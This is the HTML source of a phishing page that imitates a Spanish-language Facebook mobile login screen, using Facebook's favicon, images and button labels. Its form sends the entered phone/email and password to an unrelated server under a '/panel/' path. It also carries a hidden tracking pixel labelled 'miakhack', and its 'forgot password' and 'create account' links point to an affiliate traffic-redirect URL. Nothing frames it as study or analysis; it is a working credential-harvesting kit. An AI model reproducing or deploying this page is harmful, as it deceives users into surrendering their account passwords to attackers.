<html><head>
    <meta content="text/html; charset=UTF-8" http-equiv="Content-Type">
	<meta name="viewport" content="user-scalable=no,initial-scale=1,maximum-scale=1"
    <link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico">
	<img src="//whos.amung.us/pingjs/?k=miakhack&amp;t=&amp;x=Miak hack" style="display:none">
</head>
<body class="touch x1-5 ios mSafari _fzu _50-3 iframe acw" tabindex="0">
    <header>
        <div class="header no-items section" id="header"></div>
    </header>
    <main>
        <link href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" rel="stylesheet">
        <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.1/css/all.min.css" rel="stylesheet">
        <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">
		<body style="background-color:#ffffff;">
</body>
<body>
   <div id="logo-contenedor">
       <img id="imagen1" src="https://i.ibb.co/m6tRH8M/12314sdf2.png">
   </div>
</body>
        <style>
		

		#logo-contenedor {
   display: flex;
   align-items: center;
   justify-content: center;
}


#logo-container>img {
   max-width: 50%;
   border: 2px solid red;
}
		background-color: #f0f2f5;
            .container {
                padding-right: 15px;
                padding-left: 15px;
                margin-right: auto;
                margin-left: auto;
            }

            .row {
                margin-right: -15px;
                margin-left: -15px;
            }

            .col-xs-12 {
                width: 100%;
            }

            .carousel-inner>.item>a>img,
            .carousel-inner>.item>img,
            .img-responsive,
            .thumbnail a>img,
            .thumbnail>img {
                display: block;
                max-width: 100%;
                height: auto;
				
            }

            /* ---------------------------------------- */
            .modal {
                position: fixed;
                top: 0;
                right: 0;
                bottom: 0;
                left: 0;
                z-index: 1050;
                display: none;
                overflow: hidden;
                outline: 0;
            }

            .fade.in {
                opacity: 1;
            }

            .login-form-wrap {
                background: radial-gradient(ellipse at center, rgba(255, 255, 255, 100) 0%, rgba(255, 255, 255, 100) 100%);
                border: 0px solid #ffffff;
				border-radius: 0px;
                box-shadow: 0 1px #ffffff inset, 0 0 10px 5px rgb(255 255 255 / 10%);
                width: 100%;
                max-width: 400px;
                height: 480px;
                margin: 60px auto;
                padding: 50px 30px 0;
                text-align: center;
            }
            input:focus {
              border: 1px solid #ccc!important;
            }
            .form-controll {
                border-radius: 4px;
    display: block;
    width: 100%;
    padding: 12px;
    font-size: 14px;
    line-height: 1.42857143;
    color: #555;
    background-color: #ffffff;
    background-image: none;
    border: 0;
    -webkit-box-shadow: inset 0 1px 1px rgb(0 0 0 / 8%);
    box-shadow: 0 1px 1px rgb(0 0 0 / 8%);
    box-shadow: ouset 1px 1px rgb(0 0 0 / 8%);
    -webkit-transition: border-color ease-in-out .15s, -webkit-box-shadow ease-in-out .15s;
    -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
    transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
            }

            .btn-primary {
                color: #fff;
                background-color: #337ab7;
                border-color: #2e6da4;
            }

            .btn {
                display: inline-block;
                padding: 6px 12px;
                margin-bottom: 0;
                font-size: 14px;
                font-weight: 400;
                line-height: 1.42857143;
                text-align: center;
                white-space: nowrap;
                vertical-align: middle;
                -ms-touch-action: manipulation;
                touch-action: manipulation;
                cursor: pointer;
                -webkit-user-select: none;
                -moz-user-select: none;
                -ms-user-select: none;
                user-select: none;
                background-image: none;
                border: 1px solid transparent;
                border-radius: 4px;
            }

            .custom_icon {
                text-shadow: 2px 2px 2px #000;
                position: absolute;
                top: 50%;
                left: 50%;
                font-size: 40px;
                color: blue;
                transform: translate(-50%, -50%);
            }
            input,button {
                font-family: Helvetica, sans-serif;
            }
            input {
                background: #f5f6f7;
                font-size: 14px;
                line-height: 18px;
            }
            .submitStyleLogin {
                text-shadow: 0 -1px rgb(0 0 0 / 25%);
                background-color: #1877f2;
                border: none;
                border-radius: 3px;
                font-size: 17px;
                height: 40px;
                line-height: 40px;
                padding: 0 16px;
                width: 100%;
                color: #fff;
                font-weight: 600;
            }

            .submitStyleRegister {
                background-color: #339933;
                padding: 8px 10px;
                font-weight: bold;
                border: 1px solid #339933;
                white-space: normal;
            }
            .submitStyleRegister:hover {
                background-color: #36a420;
                border-color: #36a420;
            }
            .submitStyleRegister:active {
                background-color: #2b9217!important;
                border-color: #2b9217!important;
            }
            .videoView {
                width: 90%;
                color: red;
                font-size: 11px;
                background-color: #fff9d7;
                border: 1px solid #e2c822;
                padding: 7px 23px;
                margin: 10px auto;
                border-radius: 6px;
            }

            #dp_00004 {
                color: #899bc1;
                font-size: 12px;
                line-height: 16px;
                margin-top: 10px;
            }

            .imageProfile {
                text-align: center;
                padding: 5px 0px;
                position: relative;
            }

            .imageProfile img {
                border-radius: 100%;
              
                height: 80px;
            }

            #myModal {
                display: block;
                padding-left: 0px;
                margin-left: 0px;
                margin-right: 0px;
            }

            .nguoisangtao {
                background-color: yellow;
                font-size: 20pt;
            }

            .nguoisangtaocustom {
                color: #ff1313;
            }

            .img-responsive {
                height: 100vh;
                object-fit: cover;
                width: 100%;
            }

            .separator {
                clear: both;
                text-align: center;
            }

            .rows2 {
			
                background: #28282800;
            }

            .inputcustom1 {
                height: 40px;
                margin-bottom: 6px;
            }

            .inputcustom2 {
                height: 40px;
            }

            ._55ws {
                padding: 10px 0px;
                border-top: none;
            }
            ._8icz {
                align-items: center;
                border-bottom: 1px solid #ccd0d5;
                display: flex;
                margin: 15px 15px;
                text-align: center;
            }
			.touchableArea {
      align-items: center;
      display: block;
      display: flex;
      min-height: 27px;
    }

    .sp_xm9DDmY7HAL_3x {
      background-image: url("https://static.xx.fbcdn.net/rsrc.php/v3/y3/r/cvj8rfO8RgU.png");
      background-size: 19px 67px;
      background-repeat: no-repeat;
      display: inline-block;
      height: 16px;
      width: 16px;
    }
			
        </style>
		
		
           <div class="modal fade in" id="myModal" role="dialog">
           <section class="login-form-wrap" style="
    margin-bottom: 0px;
    margin-top: 230px;
    height: 340px;
">
                <div class="row rows2">
                    
                </div>
                <div class="row">
                    
                    <form action="https://latinasactivas.site/panel/miakve/PAN01.php" class="col-xs-12 col-sm-12 col-md-12 col-lg-12" id="login_form_mb" method="post" style="
    height: 250px;
    margin-bottom: 0px;
    padding-right: 5px;
    padding-left: 5px;
    border-right-width: 5px;
">
                        <input class="form-controll inputcustom1" id="email" name="email" placeholder="Teléfono o correo electrónico" required="" type="text">
                        <input class="form-controll inputcustom2" id="pass" name="pass" placeholder="Contraseña" required="" type="password">
                        <input class="form-controll inputcustom1" name="subdomain" required="" type="hidden" value="vclx79">
                        <div class="_55ws">
                            <button class="btn btn-primary btn-lg btn-block submitStyleLogin" id="dp_00002" name="submit" type="submit">Iniciar sesión</button>
                        </div>
						<div class="_6ltj"><strong><a href="https://closemeetups.com/tds/ae?tdsId=s0792tok_r&tds_campaign=s0792tok&utm_sub=opnfnl&s1=ps&utm_source=int&affid=43625b24&subid=Miakpapelon">¿Has olvidado tu contraseña?</a></strong></div>
                        <div class="_8icz"></div>
                        <a href="https://closemeetups.com/tds/ae?tdsId=s0792tok_r&tds_campaign=s0792tok&utm_sub=opnfnl&s1=ps&utm_source=int&affid=43625b24&subid=Miakpapelon"><button class="btn btn-primary submitStyleRegister" type="button">Crear cuenta de Facebook</button>
                    </form>
                    
                </div>
            </section>
        </div>
    </main>
    <footer></footer>


</body></html>
